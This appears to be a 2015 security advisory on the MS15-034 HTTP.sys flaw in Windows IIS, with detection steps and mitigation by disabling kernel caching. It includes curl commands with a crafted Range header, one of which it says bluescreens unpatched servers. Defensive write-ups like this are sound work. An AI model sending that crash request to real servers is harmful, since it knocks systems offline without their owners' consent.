On April 14, Microsoft released a critical security patch (MS15-034) for the HTTP protocol stack, which is commonly used by Windows IIS web services. While it doesn’t have a catchy nickname or slick logo, there have been some good discussions around it, and this is a serious vulnerability that affects millions of Internet-facing web servers.
Attackers are racing to reverse engineer this patch to remotely execute code and take over vulnerable systems. Right now, by sending a single, specially crafted HTTP request, an attacker can crash unpatched Windows web servers.
The patch supplied by Microsoft should be applied immediately. This vulnerability exists within HTTP.sys and is exploitable when the kernel caching feature of IIS is enabled. Kernel caching is enabled by default. Kernel caching can be disabled to mitigate this vulnerability in cases where a patch cannot be immediately applied.
Detecting the Vulnerability
The vulnerability can be triggered by specifying the Range header in an HTTP request. A vulnerable install will respond with an HTTP 416 Requested Range Not Satisfiable error.
#curl -v http://vulnerable.example.com/ -H "Range: bytes=00-18446744073709551615" ---snip--- < HTTP/1.1 416 Requested Range Not Satisfiable < Content-Type: text/html < Last-Modified: Mon, 03 Feb 2014 22:08:50 GMT < Accept-Ranges: bytes < ETag: "3fa4eb842c21cf1:0" < Server: Microsoft-IIS/7.5 < Date: Thu, 16 Apr 2015 02:10:24 GMT < Content-Length: 362 < Content-Range: bytes */151
Specifying a valid file and byte range of 100 will result in a bluescreen.
#curl -v http://vulnerable.example.com/image.jpg -H "Range: bytes=100-18446744073709551615"
A patched install will respond with an HTTP 400 Bad Request error.
#curl -v http://vulnerable.example.com/ -H "Range: bytes=00-18446744073709551615" ---snip--- < HTTP/1.1 400 Bad Request < Content-Type: text/html; charset=us-ascii < Server: Microsoft-HTTPAPI/2.0 < Date: Thu, 16 Apr 2015 00:53:17 GMT < Connection: close < Content-Length: 339
Note: This exploitation was tested on an unpatched Windows 2008 R2 default IIS installation.
Mitigation for MS15-034
If the MS15-034 patch cannot be installed, the kernel caching feature can be disabled to prevent exploitation.
To disable kernel caching:
- Open IIS Manager
- In Features View, double-click Output Caching
- On the Output Caching page, in the Actions pane, click Edit feature settings
- In the Edit Output Cache Settings dialog box, deselect Enable kernel cache and then click OK